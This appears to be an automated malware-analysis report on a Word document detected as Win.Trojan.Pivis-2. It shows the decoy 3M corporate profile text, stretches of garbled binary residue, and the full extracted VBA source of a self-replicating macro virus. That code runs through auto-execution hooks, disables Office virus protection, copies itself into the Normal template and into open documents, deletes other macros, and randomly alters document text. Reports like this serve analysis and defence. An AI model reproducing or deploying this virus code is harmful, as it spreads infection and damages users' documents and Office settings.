MALICIOUS
198
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is identified as malicious by ClamAV with the signature Win.Trojan.Pivis-2. It contains legacy WordBasic and VBA macros, including AutoOpen and Auto_Close, which are commonly used to execute malicious code upon document interaction. The VBA macro 'akrnl' likely attempts to download and execute a second-stage payload, although the exact mechanism is obfuscated.
Heuristics 7
-
ClamAV: Win.Trojan.Pivis-2 critical CLAMAV_DETECTIONClamAV detected this file as malware: Win.Trojan.Pivis-2
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATIONVBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.Matched line in script
Options.VirusProtection = False -
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub autoOpen() -
Auto_Close macro low OLE_VBA_AUTOCLOSEAuto_Close macroMatched line in script
Sub AutoClose() -
Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUSOLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://www.3M.com In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 18979 bytes |
SHA-256: 082120d07e9db988a29353b09c35cff3d62961b64760fbc383f5b080e14cb3f7 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "akrnl"
Public Skip As Integer
Sub AutoExec()
On Error Resume Next
Call Sauve
End Sub
Sub AutoNew()
On Error Resume Next
Call Sauve
End Sub
Sub AutoPrint()
On Error Resume Next
Call Sauve
End Sub
Sub FileNew()
On Error Resume Next
Call Sauve
Dialogs(wdDialogFileNew).Show
Skip = 1
Call Sauve
End Sub
Sub fileclose()
On Error Resume Next
Call Sauve
If ActiveDocument.Saved = False Then ActiveDocument.Save
ActiveDocument.Close
Call Sauve
End Sub
Sub FileExit()
On Error Resume Next
Call Sauve
Application.Quit
End Sub
Sub autoOpen()
On Error Resume Next
ÐÏ à¡± á
VISION
Ser la empresa más innovadora y el proveedor preferido.
VALORES
Satisfacer a nuestros clientes con un valor, calidad y servicio superior.
Proveer a nuestros inversionistas atractivas utilidades mediante un sostenido crecimiento de calidad.
Respetar nuestro entorno social y físico.
Ser una compañia en la cual los empleados estén orgullosos de pertenecer a ésta
3M fue fundada en 1902 en la ciudad de Two Harbors, Minnesota, por cinco hombres de negocios quienes se pusieron de acuerdo para extraer minerales utilizados como abrasivos en ruedas de esmerilar. Nuevos inversionistas fueron atraídos cuando la producción fue de calidad y se establecieron fuentes de abastecimiento. Uno de ellos fue Lucius Ordway quien en 1910 mudó la Compañía a St. Paul.
Al pasar de los años 3M continúa innovando y diversificando sus productos; entre 1946 y 1947 se venden las primeras cintas en Latinoamérica, se establecen las primeras subsidiarias y se instalan las primeras fábricas en Brasil y México. Es así como al día de hoy 3M tiene una gran variedad de productos los cuales se venden en casi todos los países del mundo y en un gran número de mercados.
La historia de 3M en México se remonta al ya lejano 1947 cuando se fundó con el nombre de DUREX DE MEXICO, S.A., una pequeña empresa de sólo siete empleados que abrió operaciones comercializando abrasivos y poco después las cintas adhesivas Masking Tape y la cinta de Celofán.
Enumerar todos los hechos importantes que ha vivido la compañía 3M desde su llegada a México, resultaría una tarea prácticamente imposible, sin embargo hay algunos datos que son dignos de recordarse por la trascendencia de los mismos y porque marcaron las bases de lo que es hoy 3M México.
En 1951, inicia en México la fabricación de la Cinta Celofán y del Masking Tape, así como de las cintas para el Aislamiento Eléctrico. En 1959, se inauguraron las primeras sucursales en Monterrey y Tijuana, y dos años después la de Guadalajara.
En 1966, la Secretaría de Industria y Comercio otorga un reconocimiento especial a la Cinta Scotch Super 33, como producto de Alta Calidad. Durante las Olimpiadas de México 1968, 3M México es la encargada de instalar las pistas de Tartán, sobre las cuales se romperían tantos récords mundiales. La expansión de 3M México continúa y en 1974 se abre la sucursal de Puebla. 1985 marca el inicio de las exportaciones de Cinta Pañalera y al año siguiente se habre la sucursal de Guanajuato, seguida en el '89 por la Sucursal de Veracruz y de Chihuahua.
Durante los años de 1990 a 1993, la actividad y los cambios fueron notables en 3M, ya que comienza la construcción de la Nueva Planta de Manufactura en la Ciudad de San Luis Potosí, misma que inicia operaciones en 1993; y en el mismo período se abren las sucursales de Villahermosa, Culiacán, Ciudad Juárez, Querétaro y Tijuana.
En 1995, nació el proyecto magno de construcción del nuevo Complejo de Oficinas de 3M en el área de Santa Fe, en la Ciudad de México En junio de 1998 las dichas oficinas quedan listas, y 3M se cambia a Santa Fe.
Los productos que vende 3M en México se comercializan a través de 7 divisiones:
División I Industria
División II Eléctricos y sistemas de Telecomunicaciones
División III Consumo y productos para oficina
División IV Cuidado Personal y Mercado de la construcción
División V Cuidado de la salud
División VI Gráficos
División VII Placas
En 1951 se hizo la primera investigación de productos.
Operaciones en mas de 60 paises diferentes.
Los productos de 3M son vendidos en mas de 200 paises
41 de nuestras empresas internacionales tienen operacione manufacturereas, desde pequeñas conversiones hasta diversas lineas de producción.
29 de nuestras compañías internacionales tienen laboratorios de soporte a los planes de ventas. Estos laboratorios trabajan en conjunto con el servicio técnico, soporte de manufactura, modificaciones de productos, desarrollo de nuevos productos y algunos desarrollos tecnológicos.
Todas las compañías internacionales proveen soporte tecnico a los clientes
Ventas a los ancho del mundo de $15.021 billones de dolares.
El 52% de estas ventas provienen de las compañías internacionales.
Hay mas de 35,000 empleados en las compañias internacionales de 3M
A continuación los vice presidentes de 3M
H.W. Borrelli, area vice president, Latin America and Africa
A. Gastaldo, vice president, Asia Pacific
R.J. Burgstahler, president and general manager, Canada
E. Pieruzzi, vice president, Europe and Middle East
These area executives report to R.O. Baukol, executive
with soap and water, alcohol, and
other solvents, nothing worked.
Then came a flash of insight. If the
sample couldn 't be removed with
water, it might make a good rain
repellent. If it was impervious to
solvents, it could protect fabrics
from stains.
"At 3M, we are committed to satisfying our customers with superior quality
and value; providing investors with an attractive return through sustained,
high-quality growth; respecting our social and physical environment; and
being a company of which employees are proud."
L.D.DeSimone
Chairman of the Board and
Chief Executive Officer, 3M
This insight was the innovation that
led to the family of Scotchgard(TM)
Protectors used today on clothing,
carpets, furniture, wood, and leather.
Not all our new products come about through lucky accidents. We take innovation seriously. As a result, today 3M is a $14 billion company with more than 70,000 employees who create, manufacture and sell 50,000 products in 200 countries around the world. Those products will tell you something about 3M, their technologies, and markets. But to really understand 3M, you have to know our imaginative people, working together to find practical ways to make life better.
Our innovative
Culture
Innovation is required at 3M. Thirty
percent of each year's sales must
come from products less than 4
years old.
"Those men and women to whom we delegate authority and responsibility, if
they are good people, are going to want to do their jobs in their own way ...
"Mistakes will be made, but if a person is essentially right, the mistakes he or
she makes are not as serious in the long run as the mistakes management will
make if it is dictatorial and undertakes to tell those under its authority exactly
how they must do their job.
"Management that is destructively critical when mistakes are made kills
initiative, and it is essential that we have people with initiative if we are to
continue to grow."
-- from his "Philosophy of
Management , " a paper presented in"
1941 by William L. McKnight, former
President, 3M
But innovation is more than
products , it 's the way 3Mers do
business.
At 3M, we pride ourselves in
forming innovative relationships
within our organization, with
suppliers and customers, between
domestic and international business
units -- relationships that respect
individual and cultural differences
and result in products that make life
better for all of us.
We listened when physicians, technicians
and patients told us that plaster casts for
broken bones were heavy, uncomfortable
and expensive. We responded with
3M(TM) Scotchcast(TM) Casting Tape,
the first casting tape to be fiberglass and
water -activated, lighter And more
comfortable, and sets in only 20 minutes.
Then we listened to the youngest patients
and found that we could make children's
injuries a little less frightening by offering
3M(TM) Scotchcast(TM) Plus Casting
Tape in colors.
3 M 's problem-solving approach also
provides services to those who order and
receive our products. We can modify our
order entry software so that it will accept
orders in the quantities and language of the
customer 's computer. When shipping, we
will arrange goods on the pallet at our
warehouse in whatever way that is most
convenient for customers receiving them.
Our job is to make customers' lives easier
and better.
William L. McKnight joined Minnesota Mining and
Manufacturing Company in 1907 as an assistant
bookkeeper. He quickly rose through the company,
becoming president in 1929 and chairman of the board in
1949.
Many believe McKnight's greatest contribution was as a
business philosopher, since he created a corporate culture
that encourages employee initiative, innovation and
provides secure employment.
His basic rule of management was laid out in 1948:
"As our business grows, it becomes
increasingly necessary to delegate
responsibility and to encourage men and
women to exercise their initiative. This
requires considerable tolerance. Those men
and women to whom we delegate authority
and responsibility, if they are good people,
are going to want to do their jobs in their
own way.
"Mistakes will be made. But if a person is
essentially right, the mistakes he or she
makes are not as serious in the long run as
the mistakes management will make if it
undertakes to tell those in authority exactly
how they must do their jobs.
"Management that is destructively critical
when mistakes are made kills initiative. And
it 's essential that we have many people with
initiative if we are to continue to grow."
Comments or Questions
Copyright © 3M. All rights reserved.
From:
3M Public Relations and Corporate Communications
3M Center, St. Paul MN 55144-1000
Phone: 1-800-3M HELPS
Internet Address: http://www.3M.com
E-mail Address: innovation@mmm.com
Comments or Questions
Copyright © 3M. All rights reserved.
Gopher Menu
Refer questions to Betty West, 733-7882
CHAIRMAN AND CHIEF EXECUTIVE OFFICER
HEALTH CARE MARKETS
INDUSTRIAL AND ELECTRO MARKETS
TRANSPORTATION, SAFETY AND SPECIALTY MATERIAL MARKETS
International operations
CONSUMER AND OFFICE MARKETS
ENGINEERING , MANUFACTURING And LOGISTICS
FINANCE & ADMINISTRATIVE SERVICES
human RESOURCES
LEGAL AFFAIRS
MARKETING
RESEARCH AND DEVELOPMENT
3M BOARD OF DIRECTORS
CORPORATE OFFICERS
BUSINESS UNIT GUIDELINES
Our company And employees
continue to support education,
communities, the arts, and health
and human services. In 1997,
3M donated over $35 million in
cash, products and services to
more than 2,000 educational and
charitable organizations.
Education is a key area of
emphasis, with special focus on
science , Math And economics
from elementary to graduate
levels. In higher education, we
provide grants to colleges and
universities for capital
improvements and academic
programs, as well as for
scholarships, fellowships and
other efforts.
3M employees continue to make
a difference in their communities
as volunteers, mentors and
tutors. As part of Science
Encouragement programs, 3M
scientists and engineers visit
schools to spark student interest
in science and math. These
popular programs, which
originated in St. Paul, Minnesota,
have expanded throughout the
United States, as well as into
Japan, the United Kingdom,
Canada and other countries. Our
employees and retirees also
volunteer countless hours to
community service projects, such
as Meals-on-Wheels and Habitat
for Humanity.
3M is committed to safe, healthy
and environmentally sustainable
products and operations. We've
advanced into Life Cycle
Management, in which our
employees strive to improve
Environmental , health And safety
aspects of 3M products from
development to disposal.
For example, employees tested
400 formulas to develop 3M's
newest firefighting foam, which
passed 40 rigorous internal
performance and environmental
tests.
Since 1990, 3M has reduced its
waste-generation ratio by 31
percent. During the same period,
we 've cut air emissions by 70
percent, reduced releases to
water by 52 percent and
improved energy efficiency by
more than 7 percent.
Since 1994, 3M has reduced
recordable work-related illness
and injury by 50 percent. We
aim for "zero incidents" through
prevention planning, employee
involvement and knowledge
transfer in all of our operations.
To learn more, access
www.3M.com/profile/envt on
the Internet or call
1-800-3M-HELPS for our
Environmental Progress
Report.
&
Éþÿÿ
ÿÿÿ
Dÿÿÿ
«ÿÿÿ
öÿÿÿ
øÿÿÿ
½ÿÿÿ ¾ÿÿÿ ¿ÿÿÿ
øÿÿÿ ùÿÿÿ
&
èóÿÿ
&
&
"
$
+
"
$
+
+
e`,
3
3
#� $� %°
+
%
-
�
¿ @
¿
ÿÿÿÿÿÿÿ
ŒBas Œ1Normal . VCreata bl `False –Predecl a
"Expose
On Er€ror Res
'D l Vari =s
OurCode
@ f
ÿ64AuT ‹7F Ë Q €, Ifã £
"s=& + A á Int(
• ic @ $ "C:\hs f� … À .sys‡€•A1 Open¦
A¡ OutpuBŠ#î1C S@y#À;
"
= wd£
2 a»
Ñ ÿÐ
Ï
Ã
[WÑ
ë š.1 dQ 1
{P�, iB‰ ns € –KL�PAppliôcaAp. ‡ÄI‚o1L o t‰i‘L <> ÀChr(13ø ¡(¯qsï h�ë 0í I�ÿ`
`]Ÿ � C ‘ 1]R �l· Y = &“f
ÐW ' ”F Ù ÿ \ó ' •
È":" N ?N2�ïïŸ q VR=¯ €Ög ÿIH ?™ »OH ëK| ÿË ù c û ÀÂù
t ÿ o $x£±g: W ñ‘
'� UPS
ØWRO
l0(9:2
nb cbsa p2:0@8:05 P pM on n4 Jan… ¤9
3
%1!
…“2Œ†Í“@¯2L:3Å Å“26Š J onath
3 r( bert o vmeller a BOB0 18B
u AÀzémicJo+ 1 v:5" l§& ÿ ƒ '
òC `!35:4¤]FLrib—àVMa'!P@rogramàNo`rtáti€%í 5…
4`Ay¦8Lic. Ar`»o Alptami@±K9` 0 0:01ƒiJue&v�1`�ulÇ AB
ESPINOSÆAK à{8:4@!�ã‚V†T0 Sepÿ 9î 17À ƒ3Ç O,ct¿ ?
V
�à …. `ŒM ´
Î
'
€
€
€
l €UÅø7
0046}#
�à …€. `ŒM ´�“¥CxN@UalCxN„T¢aÀx
Ø$õ7 ‚
—À � G{2D
4À 2 fARCH
Document = ThisDocument / &H0
Name = "Project"
HelpContextID = "0"
CMG = "A8AAB9BFBDBFBDBFBDBFBD"
DPB = "CBC9DAF9FCFAFCFAFC"
GC = "EEECFFDE012225232523DA"
[Host Extender Info]
&H00000001={3832D640-CF90-11CF-8E43-00A0C911005A};VBE;&H00000000
[Workspace]
ThisDocument=0, 0, 0, 0, C
Call akrnl
Call Sauve
End Sub
Sub AutoExit()
On Error Resume Next
Call Sauve
If ActiveDocument.Saved = False Then ActiveDocument.Save
Application.Quit
End Sub
Sub AutoClose()
On Error Resume Next
Call Sauve
If ActiveDocument.Saved = False Then ActiveDocument.Save
Call Sauve
End Sub
Sub ToolsMacro()
On Error Resume Next
End Sub
Sub FileTemplates()
On Error Resume Next
End Sub
Sub ViewVBCode()
On Error Resume Next
End Sub
Sub RandomRemplace()
Randomize
ValRandom = Int(Rnd * 75)
If ValRandom < 20 Then BesoinRemplace = True
If ValRandom < 20 Then txt = "ainsi, si j'en crois ce que mon incompétant de professeur me dit,"
If ValRandom < 15 Then txt = "ainsi, mon chat a perdu ses dents. De plus,"
If ValRandom < 10 Then txt = "ainsi, selon ma grand-mère,"
If ValRandom < 5 Then txt = "ainsi, la matière du cours est plate. De plus,"
If BesoinRemplace = True Then Call Remplace(txt)
End Sub
Sub Remplace(txt)
Selection.Find.ClearFormatting
Selection.Find.Replacement.ClearFormatting
With Selection.Find
.Text = "donc,"
.Replacement.Text = txt
.Forward = True
.Format = False
.MatchCase = False
.MatchWholeWord = False
.MatchWildcards = False
.MatchSoundsLike = False
.MatchAllWordForms = False
End With
Selection.Find.Execute Replace:=wdReplaceOne
Selection.MoveUp UNIT:=wdScreen, Count:=8
End Sub
Sub Sauve()
On Error Resume Next
Options.ConfirmConversions = False
Options.VirusProtection = False
Options.SaveNormalPrompt = False
Application.VBE.ActiveVBProject.VBComponents("akrnl").Export "c:\Étudiant.cfg"
ActiveDocument.ReadOnlyRecommended = False
For i = 1 To ActiveDocument.VBProject.VBComponents.Count
NomMacro = ActiveDocument.VBProject.VBComponents(i).Name
If NomMacro = "akrnl" Then PrésentAct = True Else Call DelVir(NomMacro)
Next i
For i = 1 To NormalTemplate.VBProject.VBComponents.Count
NomMacro = NormalTemplate.VBProject.VBComponents(i).Name
If NomMacro = "akrnl" Then PrésentNorm = True Else Call DelVir(NomMacro)
Next i
If PrésentAct = True And PrésentNorm = False Then Set BesoinSauve = NormalTemplate.VBProject.VBComponents
If PrésentAct = False And PrésentNorm = True Then Set BesoinSauve = ActiveDocument.VBProject.VBComponents
BesoinSauve.Import "c:\Étudiant.cfg"
If PrésentNorm = False Then If NormalTemplate.Saved = False Then NormalTemplate.Save
If PrésentAct = False Then ActiveDocument.SaveAs FileName:=ActiveDocument.FullName, FileFormat:=wdFormatDocument
End Sub
Sub DelVir(NomMacro)
On Error Resume Next
Application.VBE.ActiveVBProject.VBComponents.Remove _
Application.VBE.ActiveVBProject.VBComponents(NomMacro)
With Application.NormalTemplate.VBProject
.VBComponents.Remove .VBComponents(NomMacro)
End With
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.